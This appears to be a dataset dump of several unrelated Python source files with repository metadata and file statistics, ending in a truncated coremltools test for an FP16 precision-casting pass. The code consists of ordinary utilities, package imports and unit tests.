tys-hiroshi/bnoteapi
|
d0eb6b4f3b46c11a1c893966d99e3fc01bf6e960
|
[
"MIT"
] | null | null | null |
openapi_server/utils/GenRandom.py
|
tys-hiroshi/bnoteapi
|
d0eb6b4f3b46c11a1c893966d99e3fc01bf6e960
|
[
"MIT"
] | 9
|
2020-05-22T10:49:35.000Z
|
2020-08-26T12:25:23.000Z
|
openapi_server/utils/GenRandom.py
|
tys-hiroshi/bnoteapi
|
d0eb6b4f3b46c11a1c893966d99e3fc01bf6e960
|
[
"MIT"
] | 1
|
2020-08-06T06:19:39.000Z
|
2020-08-06T06:19:39.000Z
|
# coding: UTF-8
import random
class GenRandom:
def __init__(self):
pass
def generate_random_index(self, max_indexnum):
        # Randomly select multiple elements, without duplicates
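        # random.sample over range(max_indexnum) with k == max_indexnum returns a shuffled permutation with no repeats.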
return random.sample(list(range(0, max_indexnum)), k=max_indexnum)
| 17.714286 | 74 | 0.665323 | 31 | 248 | 5.032258 | 0.741935 | 0.211538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010695 | 0.245968 | 248 | 13 | 75 | 19.076923 | 0.823529 | 0.129032 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.166667 | 0.166667 | 0.166667 | 0.833333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
0f0c014357419a4620c043e5031b70bd6fc48b5d | 296 | py | Python | fugue_ibis/__init__.py | LaurentErreca/fugue | 73d551b4d25b50b3d9051dd765e6111db2e3fc76 | ["Apache-2.0"] | null | null | null | fugue_ibis/__init__.py | LaurentErreca/fugue | 73d551b4d25b50b3d9051dd765e6111db2e3fc76 | ["Apache-2.0"] | null | null | null | fugue_ibis/__init__.py | LaurentErreca/fugue | 73d551b4d25b50b3d9051dd765e6111db2e3fc76 | ["Apache-2.0"] | null | null | null |
# flake8: noqa
from fugue_ibis.execution.ibis_engine import IbisEngine, register_ibis_engine
from fugue_ibis.execution.pandas_backend import _to_pandas_ibis_engine
from fugue_ibis.extensions import as_fugue, as_ibis, run_ibis
def register():
register_ibis_engine(1, _to_pandas_ibis_engine)
| 32.888889 | 77 | 0.851351 | 45 | 296 | 5.155556 | 0.4 | 0.215517 | 0.168103 | 0.189655 | 0.198276 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007463 | 0.094595 | 296 | 8 | 78 | 37 | 0.858209 | 0.040541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.6 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0f245e9cd154c3f71850ad9528aa67bd9e0acb0d | 96 | py | Python | venv/lib/python3.8/site-packages/pip/_internal/commands/cache.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | ["MIT"] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/pip/_internal/commands/cache.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | ["MIT"] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/pip/_internal/commands/cache.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | ["MIT"] | null | null | null |
/home/runner/.cache/pip/pool/54/8e/49/c8110edd4e89fd81783c8961a8faf9a3b95e426e04a7f2f237a8dde190
| 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.416667 | 0 | 96 | 1 | 96 | 96 | 0.479167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7e1fdc318ae685ba70482c7e44d14ffb50b46fab | 2,710 | py | Python | scout/load/report.py | mhkc/scout | a7162f28c0f3490c3f3376268118fa8e6072a9db | ["BSD-3-Clause"] | null | null | null | scout/load/report.py | mhkc/scout | a7162f28c0f3490c3f3376268118fa8e6072a9db | ["BSD-3-Clause"] | null | null | null | scout/load/report.py | mhkc/scout | a7162f28c0f3490c3f3376268118fa8e6072a9db | ["BSD-3-Clause"] | null | null | null |
# -*- coding: utf-8 -*-
import logging
from scout.adapter import MongoAdapter
from scout.exceptions import IntegrityError, DataNotFoundError
LOG = logging.getLogger(__name__)
def load_delivery_report(
adapter: MongoAdapter, report_path: str, case_id: str, update: bool = False
):
"""Load a delivery report into a case in the database
If the report already exists the function will exit.
    If the user wants to load a report that is already in the database
'update' has to be 'True'
Args:
adapter (MongoAdapter): Connection to the database
report_path (string): Path to delivery report
case_id (string): Optional case identifier
update (bool): If an existing report should be replaced
Returns:
updated_case(dict)
"""
case_obj = adapter.case(case_id=case_id)
if case_obj is None:
raise DataNotFoundError("no case found")
if update or case_obj.get("delivery_report") is None:
_update_report_path(case_obj, report_path, "delivery_report")
else:
raise IntegrityError("Existing report found, use update = True to " "overwrite")
LOG.info("Saving report for case {} in database".format(case_obj["_id"]))
return adapter.replace_case(case_obj)
def load_cnv_report(adapter: MongoAdapter, report_path: str, case_id: str, update: bool = False):
"""Load a CNV report into a case in the database
If the report already exists the function will exit.
    If the user wants to load a report that is already in the database
'update' has to be 'True'
Args:
adapter (MongoAdapter): Connection to the database
report_path (string): Path to CNV report
case_id (string): Optional case identifier
update (bool): If an existing report should be replaced
Returns:
updated_case(dict)
"""
case_obj = adapter.case(case_id=case_id)
if case_obj is None:
raise DataNotFoundError("no case found")
if update or case_obj.get("cnv_report") is None:
_update_report_path(case_obj, report_path, "cnv_report")
else:
raise IntegrityError("Existing report found, use update = True to " "overwrite")
LOG.info("Saving report for case {} in database".format(case_obj["_id"]))
return adapter.replace_case(case_obj)
def _update_report_path(case_obj, report_path, report_type):
"""Updates the report path
Args:
case_obj (Case): Case object
report_path (string): Path to CNV report
report_type (string): Type of report
"""
case_obj[report_type] = report_path
return True
| 31.511628 | 97 | 0.667897 | 365 | 2,710 | 4.789041 | 0.213699 | 0.060069 | 0.029748 | 0.034325 | 0.817506 | 0.817506 | 0.817506 | 0.779176 | 0.779176 | 0.779176 | 0 | 0.000495 | 0.253875 | 2,710 | 85 | 98 | 31.882353 | 0.863996 | 0.425092 | 0 | 0.482759 | 0 | 0 | 0.183345 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.103448 | 0 | 0.310345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7e4cda9d319d1d2a96da56371cda9996475e1d2e | 201 | py | Python | stubs/esp32_1_10_0/ubinascii.py | jmannau/micropython-stubber | 8930e8a0038192fd259b31a193d1da3b2501256a | ["MIT"] | null | null | null | stubs/esp32_1_10_0/ubinascii.py | jmannau/micropython-stubber | 8930e8a0038192fd259b31a193d1da3b2501256a | ["MIT"] | null | null | null | stubs/esp32_1_10_0/ubinascii.py | jmannau/micropython-stubber | 8930e8a0038192fd259b31a193d1da3b2501256a | ["MIT"] | null | null | null |
"Module 'ubinascii' on firmware 'v1.10-247-g0fb15fc3f on 2019-03-29'"
def a2b_base64():
pass
def b2a_base64():
pass
def crc32():
pass
def hexlify():
pass
def unhexlify():
pass
| 11.823529 | 69 | 0.636816 | 29 | 201 | 4.344828 | 0.655172 | 0.222222 | 0.206349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168831 | 0.233831 | 201 | 16 | 70 | 12.5625 | 0.649351 | 0.333333 | 0 | 0.454545 | 0 | 0.090909 | 0.335 | 0.105 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | true | 0.454545 | 0 | 0 | 0.454545 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
7e9518049d723b3eed655c1940d088c1193a64ec | 343 | py | Python | bitmovin_api_sdk/encoding/encodings/muxings/mp4/drm/clearkey/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | ["MIT"] | 11 | 2019-07-03T10:41:16.000Z | 2022-02-25T21:48:06.000Z | bitmovin_api_sdk/encoding/encodings/muxings/mp4/drm/clearkey/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | ["MIT"] | 8 | 2019-11-23T00:01:25.000Z | 2021-04-29T12:30:31.000Z | bitmovin_api_sdk/encoding/encodings/muxings/mp4/drm/clearkey/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | ["MIT"] | 13 | 2020-01-02T14:58:18.000Z | 2022-03-26T12:10:30.000Z |
from bitmovin_api_sdk.encoding.encodings.muxings.mp4.drm.clearkey.clearkey_api import ClearkeyApi
from bitmovin_api_sdk.encoding.encodings.muxings.mp4.drm.clearkey.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.encodings.muxings.mp4.drm.clearkey.clear_key_drm_list_query_params import ClearKeyDrmListQueryParams
| 85.75 | 131 | 0.900875 | 47 | 343 | 6.297872 | 0.425532 | 0.121622 | 0.152027 | 0.182432 | 0.567568 | 0.567568 | 0.567568 | 0.567568 | 0.567568 | 0.567568 | 0 | 0.009063 | 0.034985 | 343 | 3 | 132 | 114.333333 | 0.885196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e19aeea80ebe518e37f6e22c7449d3bd3cc9e45 | 26 | py | Python | terrascript/local/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | ["BSD-2-Clause"] | null | null | null | terrascript/local/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | ["BSD-2-Clause"] | null | null | null | terrascript/local/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | ["BSD-2-Clause"] | null | null | null |
"""2017-11-28 18:08:03"""
| 13 | 25 | 0.538462 | 6 | 26 | 2.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.583333 | 0.076923 | 26 | 1 | 26 | 26 | 0 | 0.730769 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0e1c0d5dd1938065a5be011456c85775138d3450 | 67 | py | Python | tests/test_3_hello.py | MartaPrzyBorze/python-example | f2b8731e4c972101422a500ac08f29f7f9157332 | ["MIT"] | null | null | null | tests/test_3_hello.py | MartaPrzyBorze/python-example | f2b8731e4c972101422a500ac08f29f7f9157332 | ["MIT"] | null | null | null | tests/test_3_hello.py | MartaPrzyBorze/python-example | f2b8731e4c972101422a500ac08f29f7f9157332 | ["MIT"] | null | null | null |
import hello
def test_says_world():
assert hello.main() == 0
| 11.166667 | 28 | 0.671642 | 10 | 67 | 4.3 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018868 | 0.208955 | 67 | 5 | 29 | 13.4 | 0.792453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e57f26c2c23702fe3c7eb194eb643c8084ed0ee | 31 | py | Python | dashtable/data2rst/__init__.py | r-dgreen/DashTable | 744cfb6a717fa75a8092c83ebcd49b2668023681 | ["MIT"] | 35 | 2017-04-25T04:37:16.000Z | 2022-02-23T05:44:37.000Z | dashtable/data2rst/__init__.py | r-dgreen/DashTable | 744cfb6a717fa75a8092c83ebcd49b2668023681 | ["MIT"] | 14 | 2016-12-11T12:00:48.000Z | 2021-06-13T06:52:09.000Z | dashtable/data2rst/__init__.py | r-dgreen/DashTable | 744cfb6a717fa75a8092c83ebcd49b2668023681 | ["MIT"] | 11 | 2017-04-05T14:10:16.000Z | 2022-02-14T16:32:18.000Z |
from .data2rst import data2rst
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.129032 | 31 | 1 | 31 | 31 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e65030b0e8d80c85b0df0b92d5ff55104f23856 | 236 | py | Python | autocast/__init__.py | pmojo375/PLC | 56750a7c835463a1018f5ae3b00b5f944d053a14 | ["MIT"] | null | null | null | autocast/__init__.py | pmojo375/PLC | 56750a7c835463a1018f5ae3b00b5f944d053a14 | ["MIT"] | null | null | null | autocast/__init__.py | pmojo375/PLC | 56750a7c835463a1018f5ae3b00b5f944d053a14 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from autocast.autocast import autocast
| 23.6 | 39 | 0.813559 | 31 | 236 | 5.580645 | 0.548387 | 0.231214 | 0.369942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004831 | 0.122881 | 236 | 9 | 40 | 26.222222 | 0.830918 | 0.177966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.2 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ead769a83acb3dbc123dfdf27600bdebcffc035 | 155 | py | Python | relentless/__init__.py | mphoward/relentless | 5f7e8eb62696f45df28a948202b324563805a7f5 | ["BSD-3-Clause"] | null | null | null | relentless/__init__.py | mphoward/relentless | 5f7e8eb62696f45df28a948202b324563805a7f5 | ["BSD-3-Clause"] | 8 | 2019-12-19T21:27:25.000Z | 2019-12-20T02:47:00.000Z | relentless/__init__.py | mphoward/relentless | 5f7e8eb62696f45df28a948202b324563805a7f5 | ["BSD-3-Clause"] | null | null | null |
from . import ensemble
from . import mpi
from . import optimize
from . import potential
from . import simulate
from . import variable
from . import volume
| 19.375 | 23 | 0.774194 | 21 | 155 | 5.714286 | 0.428571 | 0.583333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180645 | 155 | 7 | 24 | 22.142857 | 0.944882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0eb16e2c714b1a736ca99dca24ccea4d24e1f504 | 310 | py | Python | entity/__init__.py | Simplon-IA-Biarritz-1/the-movie-predictor-DROMZEE | ceb443eac83110fa34c72f96dca367ffa4c1204f | ["MIT"] | 1 | 2020-03-26T12:01:42.000Z | 2020-03-26T12:01:42.000Z | entity/__init__.py | Simplon-IA-Biarritz-1/the-movie-predictor-DROMZEE | ceb443eac83110fa34c72f96dca367ffa4c1204f | ["MIT"] | null | null | null | entity/__init__.py | Simplon-IA-Biarritz-1/the-movie-predictor-DROMZEE | ceb443eac83110fa34c72f96dca367ffa4c1204f | ["MIT"] | 1 | 2021-05-14T18:25:29.000Z | 2021-05-14T18:25:29.000Z |
from entity.name_basics import NameBasics
from entity.title_akas import TitleAkas
from entity.title_basics import TitleBasics
from entity.title_crew import TitleCrew
from entity.title_episode import TitleEpisode
from entity.title_principals import TitlePrincipals
from entity.title_ratings import TitleRatings
| 38.75 | 51 | 0.887097 | 42 | 310 | 6.380952 | 0.428571 | 0.261194 | 0.335821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090323 | 310 | 7 | 52 | 44.285714 | 0.950355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7ebec3966ea8d07b2af21a542d8ce50752389218 | 57 | py | Python | OpenCLGA/utilities/httpwebsocketserver/__init__.py | czarnobylu/OpenCLGA | c002b5177104db5bcdbb0192db25fbbb45516f27 | ["MIT"] | 112 | 2017-04-07T06:02:10.000Z | 2022-02-18T11:49:11.000Z | OpenCLGA/utilities/httpwebsocketserver/__init__.py | czarnobylu/OpenCLGA | c002b5177104db5bcdbb0192db25fbbb45516f27 | ["MIT"] | 25 | 2016-11-22T08:22:53.000Z | 2017-03-01T14:46:33.000Z | OpenCLGA/utilities/httpwebsocketserver/__init__.py | czarnobylu/OpenCLGA | c002b5177104db5bcdbb0192db25fbbb45516f27 | ["MIT"] | 34 | 2017-05-22T02:56:08.000Z | 2022-02-06T05:20:56.000Z |
from .HTTPWebSocketsHandler import HTTPWebSocketsHandler
| 28.5 | 56 | 0.912281 | 4 | 57 | 13 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070175 | 57 | 1 | 57 | 57 | 0.981132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7effc8cade5f4d8d9108720119eb2a1287dd53b3 | 96 | py | Python | venv/lib/python3.8/site-packages/pexpect/replwrap.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | ["MIT"] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/pexpect/replwrap.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | ["MIT"] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/pexpect/replwrap.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | ["MIT"] | null | null | null |
/home/runner/.cache/pip/pool/45/aa/bd/5e061f22517eac7fc200b8056f32b51ff038a3436a98af6ae396a79950
| 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.427083 | 0 | 96 | 1 | 96 | 96 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7d4971a2bb40461f7beda43a62b757539c7f1e60 | 766 | py | Python | openmdao.main/src/openmdao/main/datatypes/api.py | swryan/OpenMDAO-Framework | f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec | ["Apache-2.0"] | null | null | null | openmdao.main/src/openmdao/main/datatypes/api.py | swryan/OpenMDAO-Framework | f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec | ["Apache-2.0"] | null | null | null | openmdao.main/src/openmdao/main/datatypes/api.py | swryan/OpenMDAO-Framework | f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec | ["Apache-2.0"] | null | null | null |
from openmdao.main.datatypes.array import Array
from openmdao.main.datatypes.any import Any
from openmdao.main.datatypes.bool import Bool
from openmdao.main.datatypes.complex import Complex
from openmdao.main.datatypes.dict import Dict
from openmdao.main.datatypes.enum import Enum
from openmdao.main.datatypes.event import Event
from openmdao.main.datatypes.float import Float
from openmdao.main.datatypes.file import File
from openmdao.main.datatypes.int import Int
from openmdao.main.datatypes.list import List
from openmdao.main.datatypes.slot import Slot
from openmdao.main.datatypes.str import Str
# Traits from Enthought - don't import these directly because we may
# change what they point to later
from enthought.traits.api import Python, on_trait_change
| 40.315789 | 68 | 0.83812 | 117 | 766 | 5.470085 | 0.316239 | 0.24375 | 0.325 | 0.507813 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101828 | 766 | 18 | 69 | 42.555556 | 0.930233 | 0.127937 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
add77b35b275fd8190cd1462cb860fd1b9bcb9a6 | 9,396 | py | Python | coremltools/converters/mil/mil/passes/test_fp16_compute_precision.py | tonybove-apple/coremltools | 22a8877beec7bad136ba5612d5aacd8e323ecdfc | ["BSD-3-Clause"] | 2,740 | 2017-10-03T23:19:01.000Z | 2022-03-30T15:16:39.000Z | coremltools/converters/mil/mil/passes/test_fp16_compute_precision.py | tonybove-apple/coremltools | 22a8877beec7bad136ba5612d5aacd8e323ecdfc | ["BSD-3-Clause"] | 1,057 | 2017-10-05T22:47:01.000Z | 2022-03-31T23:51:15.000Z | coremltools/converters/mil/mil/passes/test_fp16_compute_precision.py | tonybove-apple/coremltools | 22a8877beec7bad136ba5612d5aacd8e323ecdfc | ["BSD-3-Clause"] | 510 | 2017-10-04T19:22:28.000Z | 2022-03-31T12:16:52.000Z |
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
from coremltools._deps import _IS_MACOS
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil.passes import quantization_passes as transform
from coremltools.converters.mil.testing_utils import (
assert_model_is_valid,
get_op_types_in_program,
apply_pass_and_basic_check,
)
import unittest
import numpy as np
import coremltools as ct
np.random.seed(1984)
class FP16CastTransform(unittest.TestCase):
""""""
"""
Input graph:
input -----> square -----> out
Output graph:
input -----> cast(dtype="fp16") -----> square -----> cast(dtype="fp32") ---> out
"""
def test_single_input_to_single_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
x = mb.square(x=x)
return x
self.assertEqual(get_op_types_in_program(prog), ['square'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "square", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 1)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "square")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp32")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20)},
expected_output_shapes={block.outputs[0].name: (10, 20)},
)
"""
Input graph:
input -----> div -----> out
^
const(eps) ---|
Output graph:
input --------> cast(dtype="fp16") -----> div -----> cast(dtype="fp32") ---> out
^
const(eps) ---> cast(dtype="fp16") --------|
"""
def test_divide_by_zero_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
eps = mb.const(val=1e-10)
x = mb.real_div(x=x, y=eps)
return x
prev_prog, prev_block, block = apply_pass_and_basic_check(
prog, transform.FP16ComputePrecision(op_selector=lambda op: True)
)
mlmodel = ct.convert(prog, source="milinternal")
input_dict = {"x": np.random.rand(10, 20)}
if _IS_MACOS:
prediction = mlmodel.predict(input_dict, useCPUOnly=True)
assert(not np.isnan(prediction['real_div_0']).any())
assert(np.isfinite(prediction['real_div_0']).all())
"""
Input graph:
input1 ----->|
concat -----> out
input2 ----->|
Output graph:
input1 -----> cast(dtype="fp16") ----->|
concat -----> cast(dtype="fp32") ---> out
input2 -----> cast(dtype="fp16") ----->|
"""
def test_multiple_inputs_to_single_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20)), mb.TensorSpec(shape=(10, 20))])
def prog(x, y):
x = mb.concat(values= (x,y), axis=0)
return x
self.assertEqual(get_op_types_in_program(prog), ['concat'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "cast", "concat", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 1)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "concat")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp16")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 1)
self.assertEqual(cast_2.outputs[0].child_ops[0].op_type, "concat")
# Asserting third cast configuration
cast_3 = block.find_ops(op_type="cast")[2]
self.assertEqual(cast_3.dtype.val, "fp32")
self.assertEqual(len(cast_3.outputs), 1)
self.assertEqual(len(cast_3.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20), "y": (10, 20)},
expected_output_shapes={block.outputs[0].name: (20, 20)},
)
"""
Input graph:
|-----> output_1
input -----> split
|-----> output_2
Output graph:
